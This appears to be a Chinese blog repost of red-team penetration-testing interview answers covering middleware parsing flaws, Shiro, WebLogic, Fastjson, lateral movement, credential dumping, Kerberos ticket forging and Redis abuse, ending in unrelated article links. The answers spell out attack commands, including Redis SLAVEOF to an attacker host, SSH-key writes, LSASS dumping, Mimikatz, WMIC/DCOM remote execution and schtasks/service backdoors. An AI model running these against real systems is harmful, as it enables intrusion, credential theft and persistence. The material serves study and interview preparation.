2025年渗透测试面试题总结-渗透测试红队面试八(题目+回答)

news2025/5/13 8:26:59

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

渗透测试红队面试八

二百一十一、常见中间件解析漏洞利用方式

二百一十二、MySQL用户密码存储与加密

二百一十三、Linux系统加固降权思路

二百一十四、绕过CDN获取真实IP

二百一十五、CMD查询远程开放端口

二百一十六、查找域控方法

二百一十七、CSRF成因及防御(非Token方案)

二百一十八、打点常用漏洞

二百一十九、Shiro漏洞发现方法

二百二十、WebLogic权限绕过

二百二十一、Fastjson漏洞原理

二百二十二、WebLogic漏洞类型

二百二十三、IIOP协议与类似技术

二百二十四、不出网漏洞利用方法

二百二十五、Webshell不出网应对措施

二百二十六、DNS出网协议利用

二百二十七、横向渗透命令执行手段

二百二十八、PsExec与WMIC区别

二百二十九、DCOM远程执行操作

二百三十、密码抓取方法

二百三十一、密码抓取版本限制

二百三十二、抓不到密码的应对

二百三十三、域内攻击方法

二百三十四、NTLM验证机制

二百三十五、Kerberos票据攻击

二百三十六、Windows Redis利用

二百三十七、Linux Redis利用

二百三十八、Windows后门方式

二百三十九、CS的哈希与密码获取

二百四十、收集RDP记录及对抗杀软

渗透测试红队面试八

二百一十一、说说常见的中间件解析漏洞利用方式

二百一十二、mysql的用户名密码是存放在那张表里面?mysql密码采用哪种加密方式?

二百一十三、Windows、Linux、数据库的加固降权思路,任选其一

二百一十四、如何绕过CDN获取目标网站真实IP,谈谈你的思路?

二百一十五、CMD命令行如何查询远程终端开放端口

二百一十六、怎么查找域控

二百一十七、CSRF 成因及防御措施;如果不用 token 如何做防御?

二百一十八、打点一般会用什么漏洞

二百一十九、平常怎么去发现shiro漏洞的

二百二十、weblogic权限绕过有没有了解

二百二十一、fastjson漏洞利用原理

二百二十二、weblogic有几种漏洞

二百二十三、IIOP听说过吗,和什么类似

二百二十四、这几个漏洞不出网情况下怎么办

二百二十五、拿到webshell不出网情况下怎么办

二百二十六、dns出网协议怎么利用

二百二十七、横向渗透命令执行手段

二百二十八、psexec和wmic或者其他的区别

二百二十九、Dcom怎么操作?

二百三十、抓取密码的话会怎么抓

二百三十一、什么版本之后抓不到密码

二百三十二、抓不到的话怎么办

二百三十三、域内攻击方法有了解过吗

二百三十四、ntlm验证机制

二百三十五、kerberos认证黄金、白银票据制作原理,以及需要哪个值

二百三十六、window redis 需要有哪些利用手段,除了写文件和启动项

二百三十七、linux redis 写有哪些利用方式

二百三十八、windows后门包括哪些方式

二百三十九、cs hashdump和logonpasswd 分别从哪里读取哈希和密码

二百四十、如何收集rdp连接记录,如果有杀软怎么办

二百一十一、常见中间件解析漏洞利用方式

  1. IIS解析漏洞
    • 目录解析/test.asp;.jpg 被解析为ASP脚本(IIS6.0)。
    • 分号截断test.asp;.jpg 利用分号绕过扩展名检查。
    • PUT写文件:通过HTTP PUT方法上传脚本文件(需配置不当)。
  2. Apache解析漏洞
    • 多后缀解析test.php.xxx.xxx未定义,按最后一个有效后缀解析(如.php)。
    • .htaccess覆盖:上传自定义.htaccess设置解析规则(如AddType application/x-httpd-php .jpg)。
  3. Nginx解析漏洞
    • 路径解析错误/test.jpg/test.phptest.jpg 作为PHP执行(Nginx + PHP-FPM配置不当)。
    • CVE-2013-4547:利用未正确处理空格和\0字符绕过检查(如test.jpg \0.php )。

二百一十二、MySQL用户密码存储与加密

  1. 存储位置
    • 表名mysql.user 表存储用户名、主机权限及密码哈希。
    • 字段authentication_string(MySQL 5.7+)或password(旧版)。
  2. 加密方式
    • MySQL 4.1+:双重SHA1加密(SHA1(SHA1(password)))。
    • MySQL 8.0+:默认使用caching_sha2_password插件(SHA256哈希)。
  3. 补充信息
    • 查询用户权限:SELECT user, host, authentication_string FROM mysql.user;
    • 身份验证插件变更可能导致旧客户端兼容性问题(需启用mysql_native_password)。

二百一十三、Linux系统加固降权思路

  1. 最小权限原则
    • 用户权限:创建低权限用户运行服务(如www-data运行Web服务)。
    • SUID/SGID清理find / -perm /4000 -o -perm /2000查找并删除非必要特权文件。
  2. 服务与网络加固
    • 禁用无用服务systemctl disable vsftpd关闭FTP等非必要服务。
    • 防火墙规则iptables限制仅开放必要端口(如SSH仅允许特定IP)。
  3. 文件系统安全
    • 敏感文件权限chmod 600 /etc/shadow限制访问。
    • SELinux/AppArmor:启用强制访问控制,限制进程权限。

二百一十四、绕过CDN获取真实IP

  1. 历史记录查询
    • DNS历史:通过SecurityTrails、ViewDNS查询历史解析记录。
    • IP数据库:使用Censys或Shodan搜索目标域名早期绑定的IP。
  2. 子域名探测
    • 爆破子域subfinderamass发现未使用CDN的子域(如dev.example.com )。
    • 邮件服务器:分析邮件头中Received字段获取服务器IP。
  3. 主动探测技巧
    • SSRF漏洞:利用目标站点的SSRF读取内网元数据(如AWS的169.254.169.254)。
    • 全网段扫描:对目标域名解析的CDN IP段进行端口扫描,寻找非标准端口服务。

二百一十五、CMD查询远程开放端口

  1. 基础命令
    • Telnettelnet <IP> <端口>(若连接成功则端口开放)。
    • Netstatnetstat -ano | findstr "ESTABLISHED"查看本地连接。
  2. PowerShell工具
    • Test-NetConnectionTest-NetConnection <IP> -Port <端口>显示端口状态。
  3. 第三方工具
    • Nmapnmap -p 1-1000 <IP>扫描指定端口范围。
    • PortQry:微软工具,支持批量端口检测。

二百一十六、查找域控方法

  1. DNS查询
    • SRV记录nslookup -type=SRV _ldap._tcp.dc._msdcs.< 域名>定位域控的LDAP服务。
  2. 系统命令
    • nltestnltest /dclist:<域名>列出域控列表。
    • net命令net group "Domain Controllers" /domain查询域控组。
  3. LDAP查询
    • PowerShell
      powershellGet-ADDomainController -Discover -Service PrimaryDC | Select-Object Name, IPv4Address 
      

二百一十七、CSRF成因及防御(非Token方案)

  1. 漏洞成因
    • 浏览器自动携带Cookie:攻击者诱导用户访问恶意页面,触发跨站请求。
    • 无二次验证:敏感操作未校验请求来源。
  2. 防御措施(非Token)
    • SameSite Cookie:设置SameSite=Strict限制跨站请求。
    • Referer验证:检查HTTP头Referer是否来自合法域名。
    • CAPTCHA验证:关键操作前要求用户输入验证码。

二百一十八、打点常用漏洞

  1. Web漏洞
    • SQL注入:通过注入获取数据库权限(如后台管理员凭证)。
    • 文件上传:上传Webshell控制服务器(如绕过类型检查)。
  2. 服务漏洞
    • 未授权访问:Redis、MongoDB等直接执行命令。
    • RCE漏洞:如Log4j2、Fastjson反序列化。
  3. 配置缺陷
    • 默认密码:Tomcat、Jenkins等管理界面弱口令。
    • SSRF:利用内网探测或元数据服务攻击。

二百一十九、Shiro漏洞发现方法

  1. Cookie特征识别
    • RememberMe字段:Base64解码后开头为x01x02x03x04(序列化数据特征)。
  2. 漏洞扫描工具
    • ShiroExploit:自动化检测密钥及反序列化漏洞。
    • Burp插件ShiroScan检测Cookie有效性。
  3. 手工检测
    • 密钥爆破:利用已知密钥列表(如kPH+bIxk5D2deZiIxcaaaA==)测试反序列化。
    • DNSLog验证:构造恶意序列化数据触发DNS请求,确认漏洞存在。

二百二十、WebLogic权限绕过

  1. CVE-2020-14882
    • 未授权访问:访问/console/css/%252e%252e%252fconsole.portal 绕过控制台认证。
    • 利用工具weblogic-framework直接执行命令。
  2. CVE-2021-2109
    • 管理接口绕过:通过构造特殊URL路径访问后台功能。
  3. 修复建议
    • 更新补丁,限制管理接口访问IP,启用强认证机制。

二百二十一、Fastjson漏洞原理

  1. 反序列化机制
    • @type指定类:攻击者通过JSON中的@type指定恶意类触发Gadget链。
    • JNDI注入:利用com.sun.rowset.JdbcRowSetImpl 等类加载远程恶意代码。
  2. 漏洞版本
    • <=1.2.24:默认支持autoType,可直接利用。
    • 1.2.25-1.2.47:需绕过autoType检查(如利用L前缀或特殊类名)。
  3. 防御方案
    • 升级至1.2.83+版本,关闭autoType功能,使用白名单机制。

二百二十二、WebLogic漏洞类型

  1. 反序列化漏洞
    • T3协议:CVE-2018-2628利用T3反序列化执行命令。
    • XMLDecoder:CVE-2017-10271通过WLS组件触发。
  2. SSRF漏洞
    • CVE-2014-4210uddiexplorer组件未限制内网请求。
  3. 权限绕过
    • CVE-2020-14825:绕过Console组件权限校验。

二百二十三、IIOP协议与类似技术

  1. IIOP协议
    • 用途:CORBA的通信协议,用于分布式对象调用。
    • 类似技术:与RMI(Java远程方法调用)类似,均涉及序列化数据传输。
  2. 漏洞利用
    • 反序列化攻击:通过IIOP传输恶意对象触发Gadget链(如WebLogic CVE-2020-2551)。

二百二十四、不出网漏洞利用方法

  1. DNS/ICMP隧道
    • DNS协议:使用dnscat2通过DNS查询传输数据。
    • ICMP协议:利用ptunnelicmpsh建立隐蔽通道。
  2. 内网服务中继
    • SMB Relay:通过Responder工具捕获NTLM哈希并中继至其他主机。
  3. Web反向连接
    • HTTP文件传输:通过Web服务上传/下载文件(如Python http.server )。

二百二十五、Webshell不出网应对措施

  1. 内网探测
    • 扫描内网段:使用for /L %i in (1,1,255) do ping -n 1 192.168.1.%i发现存活主机。
  2. 利用现有服务
    • 数据库外联:通过MySQL SELECT ... INTO OUTFILE写入Web目录。
    • 邮件发送:使用SMTP协议将数据外传。
  3. 内存加载
    • PowerShell脚本:反射加载恶意代码,避免落地文件。

二百二十六、DNS出网协议利用

  1. DNS隧道
    • 工具dnscat2建立加密隧道,执行命令或传输文件。
    • 隐蔽性:利用TXT或CNAME记录传输数据,绕过防火墙检测。
  2. 数据渗透
    • 子域名携带数据data.example.com 解析为Base64编码的敏感信息。

二百二十七、横向渗透命令执行手段

  1. PsExec
    • 特点:需目标开启ADMIN$共享,生成服务执行命令,日志明显。
  2. WMI
    • 命令wmic /node:<IP> process call create "cmd.exe /c whoami"
    • 优势:无需安装客户端,基于135端口。
  3. SSH密钥利用
    • 条件:获取目标SSH私钥,通过ssh -i id_rsa user@ip直接登录。

二百二十八、PsExec与WMIC区别

PsExecWMIC
需目标开启ADMIN$共享和文件写入权限。仅需135端口和有效凭证,无需文件操作。
生成服务进程,日志记录明显(svchost)。通过WMI协议执行,日志较隐蔽。
适合批量操作,但易触发告警。更隐蔽,但命令长度受限。

二百二十九、DCOM远程执行操作

  1. 原理
    • DCOM接口:通过COM对象远程调用方法(如MMC20.Application)。
  2. 利用步骤
    • 列出DCOM对象Get-CimInstance Win32_DCOMApplication
    • 执行命令
      powershell$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<IP>")) $com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")

二百三十、密码抓取方法

  1. Mimikatz
    • 命令sekurlsa::logonpasswords提取内存中的明文密码和哈希。
  2. 注册表导出
    • SAM/SYSTEM文件reg save HKLM\SAM SAM.bak 导出后使用secretsdump解析。
  3. Procdump转储
    • 转储LSASSprocdump.exe -ma lsass.exe lsass.dmp ,本地用Mimikatz解析。

二百三十一、密码抓取版本限制

  1. Windows 8.1/Server 2012+
    • WDigest禁用:默认不缓存明文密码(需启用注册表项UseLogonCredential)。
  2. Windows 10/Server 2016+
    • LSASS保护:启用Credential Guard后无法直接读取内存密码。

二百三十二、抓不到密码的应对

  1. 哈希传递(Pass-the-Hash)
    • 工具psexec.pycrackmapexec使用NTLM哈希横向移动。
  2. Kerberos票据
    • 黄金票据:利用krbtgt哈希伪造TGT,访问任意服务。

二百三十三、域内攻击方法

  1. 横向移动
    • MS17-010:利用永恒之蓝漏洞攻击未修补主机。
  2. 权限提升
    • ACL滥用:修改域对象的ACL,授予自身特权(如DCsync权限)。
  3. 持久化
    • Skeleton Key:植入恶意域控后门,使用万能密码登录。

二百三十四、NTLM验证机制

  1. 三步握手
    • 协商:客户端发送NEGOTIATE_MESSAGE。
    • 挑战:服务器返回CHALLENGE_MESSAGE(包含随机Nonce)。
    • 认证:客户端使用密码哈希加密Nonce生成RESPONSE_MESSAGE。
  2. 中间人攻击
    • NTLM Relay:将认证请求中继至其他服务器,执行命令或获取权限。

二百三十五、Kerberos票据攻击

  1. 黄金票据
    • 原理:伪造TGT票据,需krbtgt的NTLM哈希和域SID。
    • 用途:访问域内任意服务。
  2. 白银票据
    • 原理:伪造特定服务的ST票据,需服务账户哈希和服务SPN。
    • 用途:仅限访问特定服务(如CIFS文件共享)。

二百三十六、Windows Redis利用

  1. 主从复制RCE
    • 步骤:设置恶意主节点,同步module.dll 执行命令。
    • 命令
      bashredis-cli -h <target> SLAVEOF <attacker-ip> 6379 
  2. 计划任务劫持
    • 写入任务:通过CONFIG SET dirdbfilename写入恶意任务文件。

二百三十七、Linux Redis利用

  1. SSH密钥写入
    • 命令
      basredis-cli -h <target> config set dir /root/.ssh redis-cli -h <target> config set dbfilename "authorized_keys" redis-cli -h <target> set x "\n\nssh-rsa AAAAB3Nz...\n\n" redis-cli -h <target> save 
  2. Crontab后门
    • 写入任务:设置定时任务反弹Shell。

二百三十八、Windows后门方式

  1. 注册表启动项
    • 路径HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  2. 计划任务
    • 命令schtasks /create /tn "Update" /tr "C:\evil.exe" /sc onstart
  3. 服务后门
    • 创建服务sc create EvilService binPath= "C:\evil.exe" start= auto

二百三十九、CS的哈希与密码获取

  1. hashdump
    • 来源:从LSASS进程内存中提取NTLM哈希。
  2. logonpasswords
    • 来源:从Windows凭据管理器获取明文密码(需WDigest启用)。

二百四十、收集RDP记录及对抗杀软

  1. 记录位置
    • 注册表HKCU\Software\Microsoft\Terminal Server Client\Servers
    • 日志文件%USERPROFILE%\Documents\Default.rdp
  2. 绕过杀软
    • 离线提取:直接复制注册表文件或日志到本地分析。
    • 隐蔽工具:使用PowerShell脚本读取注册表,避免触发行为检测。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2374522.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MiniMind:3块钱成本 + 2小时!训练自己的0.02B的大模型。minimind源码解读、MOE架构

大家好&#xff0c;我是此林。 目录 1. 前言 2. minimind模型源码解读 1. MiniMind Config部分 1.1. 基础参数 1.2. MOE配置 2. MiniMind Model 部分 2.1. MiniMindForCausalLM: 用于语言建模任务 2.2. 主干模型 MiniMindModel 2.3. MiniMindBlock: 模型的基本构建块…

如何进行前端性能测试?--性能标准

如何进行前端性能测试&#xff1f;–性能标准 前端性能测试指标&#xff1a; 首次加载阶段 场景&#xff1a;用户首次访问网页&#xff0c;在页面还未完全呈现各种内容和功能时的体验。重要指标及原因 首次内容绘制&#xff08;FCP - First Contentful Paint&#xff09;​…

通信网络编程——JAVA

1.计算机网络 IP 定义与作用 &#xff1a;IP 地址是在网络中用于标识设备的数字标签&#xff0c;它允许网络中的设备之间相互定位和通信。每一个设备在特定网络环境下都有一个唯一的 IP 地址&#xff0c;以此来确定其在网络中的位置。 分类 &#xff1a;常见的 IP 地址分为 I…

Off-Policy策略演员评论家算法SAC详解:python从零实现

引言 软演员评论家&#xff08;SAC&#xff09;是一种最先进的Off-Policy策略演员评论家算法&#xff0c;专为连续动作空间设计。它在 DDPG、TD3 的基础上进行了显著改进&#xff0c;并引入了最大熵强化学习的原则。其目标是学习一种策略&#xff0c;不仅最大化预期累积奖励&a…

热门CPS联盟小程序聚合平台与CPA推广系统开发搭建:助力流量变现与用户增长

一、行业趋势&#xff1a;CPS与CPA模式成流量变现核心 在移动互联网流量红利见顶的背景下&#xff0c;CPS&#xff08;按销售付费&#xff09;和CPA&#xff08;按行为付费&#xff09;模式因其精准的投放效果和可控的成本&#xff0c;成为企业拉新与用户增长的核心工具。 CPS…

Linux系统管理与编程15:vscode与Linux连接进行shell开发

兰生幽谷&#xff0c;不为莫服而不芳&#xff1b; 君子行义&#xff0c;不为莫知而止休。 【1】打开vscode 【2】点击左下角连接图标 【3】输入远程连接 选择合适的操作系统 输入密码&#xff0c;就进入Linux环境的shell编程了。 在vscode下面粘贴拷贝更方便。比如 然后在v…

RabbitMQ概念详解

什么是消息队列&#xff1f; 消息队列是一种在应用程序之间传递消息的技术。它提供了一种异步通信模式&#xff0c;允许应用程序在不同的时间处理消 息。消息队列通常用于解耦应用程序&#xff0c;以便它们可以独立地扩展和修改。在消息队列中&#xff0c;消息发送者将消息发送…

linux基础操作5------(shell)

一.前言 本文来介绍一下linux的shell&#xff0c;除了最后的那个快捷键&#xff0c;其他的还是做一个了解就行了。 Shell&#xff1a; 蛋壳的意思&#xff0c;是linux中比较重要的一个概念&#xff0c;所有的命令其实都称之为shell命令。 看图解&#xff1a;shell就是内核的一…

BUUCTF 大流量分析(三) 1

BUUCTF:https://buuoj.cn/challenges 文章目录 题目描述&#xff1a;密文&#xff1a;解题思路&#xff1a;flag&#xff1a; 相关阅读 CTF Wiki BUUCTF | 大流量分析 &#xff08;一&#xff09;&#xff08;二&#xff09;&#xff08;三&#xff09; 题目描述&#xff1a; …

vLLM中paged attention算子分析

简要分析vLLM中PA的代码架构和v1与v2的区别 vLLM版本&#xff1a;0.8.4 整体结构分析 首先从torch_bindings.cpp入手分析&#xff1a; 这里可以看到vLLM向pytorch中注册了两个PA算子&#xff1a;v1和v2 其中paged_attention_v1和paged_attention_v2分别实现在csrc/attentio…

多样本整合Banksy空间聚类分析(Visium HD, Xenium, CosMx)

在空间数据分析中&#xff0c;传统的单细胞聚类算法&#xff0c;例如Seurat和Scanpy中的lovain和leiden等聚类算法&#xff0c;通常在处理空间数据时忽略了空间信息。然而&#xff0c;由于细胞状态受其周围细胞的影响&#xff0c;将转录组数据与细胞的空间信息结合起来进行聚类…

使用 OAuth 2.0 保护 REST API

使用 OAuth 2.0 保护 REST API 使用 OAuth 2.0 保护 REST API1.1 不安全的api1.2 安全默认值安全默认值Spring Security 默认值 需要对所有请求进行身份验证Servlet、过滤器和调度程序安全优势 使用所有请求的安全标头进行响应缓存标头 严格传输安全标头内容类型选项需要对所有…

解决下拉框数据提交后回显名称不对

问题背景描述 页面组件使用 antd 的 Select 组件&#xff0c;下拉框的 options 数据是动态获取的&#xff0c;基本就是有value 和 label 属性的对象数组。 提交数据后&#xff0c;我们有一个保存草稿的操作&#xff0c;支持返回或者刷新页面&#xff0c;浏览其他页面之后通过其…

lenis滑动插件的笔记

官网 lenis - npm 方法一&#xff1a;基础判断&#xff08;推荐&#xff09; 通过 Lenis 自带的 scroll 和 limit 属性直接判断&#xff1a; const lenis new Lenis()// 滚动事件监听 lenis.on(scroll, ({ scroll, limit }) > {const distanceToBottom limit - scroll…

Android Framework

Android 分区 /boot&#xff1a;存放引导程序&#xff0c;包括内核和内存操作程序。/system&#xff1a;相当于电脑 C 盘&#xff0c;存放 Android 系统及系统应用。/recovery&#xff1a;恢复分区&#xff0c;可以进入该分区进行系统恢复。/data&#xff1a;用户数据区&#…

OpenMCU(六):STM32F103开发板功能介绍

概述 距上一篇关于STM32F103的FreeRTOS博客的发布已经过去很长时间没有更新了。在这段时间内&#xff0c;大家可以看到博主发表了一系列的关于使用qemu 模拟实现STM32F103的博客&#xff0c;博主本来想借助qemu开发stm32F103相关的一些软件功能&#xff0c;博主开发出来并成功运…

Rspack:字节跳动自研 Web 构建工具-基于 Rust打造高性能前端工具链

字节跳动开源了一款采用 Rust 开发的前端模块打包工具&#xff1a;Rspack&#xff08;读音为 /ɑrspk/&#xff09;。 据介绍&#xff0c;Rspack 是一个基于 Rust 的高性能构建引擎&#xff0c;具备与 Webpack 生态系统的互操作性&#xff0c;可以被 Webpack 项目低成本集成&a…

高速系统设计实例设计分析

在上几章的内容中&#xff0c;我们从纯粹高速信号的理论分析&#xff0c;到 Cadence 工具的具体使用都做了详细的讲解和介绍。相信读者通过前面章节的学习&#xff0c;已经对高速系统的设计理念及 Cadence 相应的设计流程和工具有了一个基本的认识。但是&#xff0c;对于高速电…

查看购物车

一.查看购物车 查看购物车使用get请求。我们要查看当前用户的购物车&#xff0c;就要获取当前用户的userId字段进行条件查询。因为在用户登录时就已经将userId封装在token中了&#xff0c;因此我们只需要解析token获取userId即可&#xff0c;不需要前端再传入参数了。 Control…

开发工具分享: Web前端编码常用的在线编译器

1.OneCompiler 工具网址&#xff1a;https://onecompiler.com/ OneCompiler支持60多种编程语言&#xff0c;在全球有超过1280万用户&#xff0c;让开发者可以轻易实现代码的编写、运行和共享。 OneCompiler的线上调试功能完全免费&#xff0c;对编程语言的覆盖也很全&#x…